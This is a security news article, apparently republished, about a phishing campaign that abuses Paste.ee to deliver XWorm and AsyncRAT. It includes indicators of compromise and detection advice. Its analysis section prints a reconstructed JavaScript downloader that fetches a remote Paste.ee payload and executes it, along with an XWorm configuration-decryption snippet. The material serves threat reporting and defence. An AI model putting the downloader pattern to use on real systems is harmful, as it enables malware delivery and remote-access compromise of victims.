_.png)
![[The AI Show Episode 151]: Anthropic CEO: AI Will Destroy 50% of Entry-Level Jobs, Veo 3’s Scary Lifelike Videos, Meta Aims to Fully Automate Ads & Perplexity’s Burning Cash](https://www.marketingaiinstitute.com/hubfs/ep%20151%20cover.png)
![From electrical engineering student to CTO with Hitesh Choudhary [Podcast #175]](https://cdn.hashnode.com/res/hashnode/image/upload/v1749158756824/3996a2ad-53e5-4a8f-ab97-2c77a6f66ba3.png?#)
_sleepyfellow_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![watchOS 26 May Bring Third-Party Widgets to Control Center [Report]](https://www.iclarified.com/images/news/97520/97520/97520-640.jpg)
![AirPods Pro 2 On Sale for $169 — Save $80! [Deal]](https://www.iclarified.com/images/news/97526/97526/97526-640.jpg)
![Apple Shares Official Trailer for 'The Wild Ones' [Video]](https://www.iclarified.com/images/news/97515/97515/97515-640.jpg)
Threat Actors Abuse Paste.ee Platform to Deploy XWorm and AsyncRAT
Security researchers have uncovered a sophisticated malware campaign leveraging the legitimate Paste.ee platform to distribute XWorm and AsyncRAT payloads across global command-and-control (C2) infrastructure. First identified in May 2025, the operation uses heavily obfuscated JavaScript downloaders to retrieve secondary payloads from Paste.ee links, exploiting the service’s credibility to bypass initial detection layers. Hunt.io analysts confirmed […] The post Threat Actors Abuse Paste.ee Platform to Deploy XWorm and AsyncRAT appeared first on Cyber Security News.
Security researchers have uncovered a sophisticated malware campaign leveraging the legitimate Paste.ee platform to distribute XWorm and AsyncRAT payloads across global command-and-control (C2) infrastructure.
First identified in May 2025, the operation uses heavily obfuscated JavaScript downloaders to retrieve secondary payloads from Paste.ee links, exploiting the service’s credibility to bypass initial detection layers.
Hunt.io analysts confirmed the campaign has infected over 9,500 URLs tied to paste.ee, with infrastructure spanning Germany, the United States, and offshore hosting providers.
.webp)
The attack chain begins with phishing emails distributing malicious JavaScript files masquerading as delivery notifications.
One sample, “DOCUMENT FOR DELIVERY INFORMATION.js,” uses Unicode character manipulation to hide its HTTP request logic while dynamically reconstructing the MSXML2.XMLHTTP ActiveX object.
.webp)
This technique allows the script to fetch encrypted payloads from Paste.ee URLs like http://paste.ee/d/s1uVin8i/0, which host either XWorm or AsyncRAT binaries.
Hunt.io’s automated threat intelligence platform detected anomalous SSL certificate patterns on critical ports, linking the activity to known AsyncRAT C2 servers operating under Germany-based hosting provider dataforest GmbH.
Infection Mechanism and Payload Execution Analysis
The malware’s infection sequence relies on multi-stage obfuscation to evade static analysis. Initial JavaScript payloads contain junk characters and broken syntax designed to confuse basic string-matching detectors.
Below is a reconstructed version of the downloader’s core functionality:-
```javascript
// Dynamically build HTTP object to bypass keyword scanners
var httpObj = new ActiveXObject("M" + "SXML2.XML" + "HTTP");
var payloadURL = "hxxp://paste[.]ee/d/s1uVin8i/0".replace(/xx/g,"tt");
httpObj.Open("GET", payloadURL, false);
httpObj.Send();
var maliciousCode = httpObj.ResponseText;
// Execute retrieved payload via Function constructor
(new Function(maliciousCode))();
```This script retrieves encrypted binaries that undergo additional decryption routines post-execution.
XWorm variants discovered in the campaign employ AES-encrypted configuration blocks containing C2 IPs and communication parameters:-
csharp Settings.Hosts = Conversions.ToString(AlgorithmAES.Decrypt(Settings.Hosts)); Settings.Port = Conversions.ToString(AlgorithmAES.Decrypt(Settings.Port)); Settings.KEY = Conversions.ToString(AlgorithmAES.Decrypt(Settings.KEY));
The decrypted configurations reveal connections to IP 45.145.43.244 (Germany) on ports 6606/7707, hosting AsyncRAT SSL certificates first observed in February 2025.
XWorm’s keylogging module captures system-wide input while masquerading as benign background processes, periodically exfiltrating data via AES-encrypted HTTP POST requests.
Hunt.io’s infrastructure analysis revealed coordinated C2 operations across multiple ASNs, including QuadraNet Enterprises LLC (US) and SC ITNS.NET SRL (Romania).
Threat actors maintained persistence through spoofed FiveM game server certificates on port 30120 and RDP services on port 3389 using hostnames like WIN-RI8CECQIG28.
Security teams are advised to monitor for anomalous Paste.ee URL patterns (https://paste.ee/d/[a-zA-Z0-9]{5}/0) and inspect JavaScript files for Unicode-based obfuscation.
Network traffic to German IP 45.145.43.244 or its associated domain abuwire123[.]ddns[.]net should trigger immediate containment protocols.
Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests
The post Threat Actors Abuse Paste.ee Platform to Deploy XWorm and AsyncRAT appeared first on Cyber Security News.
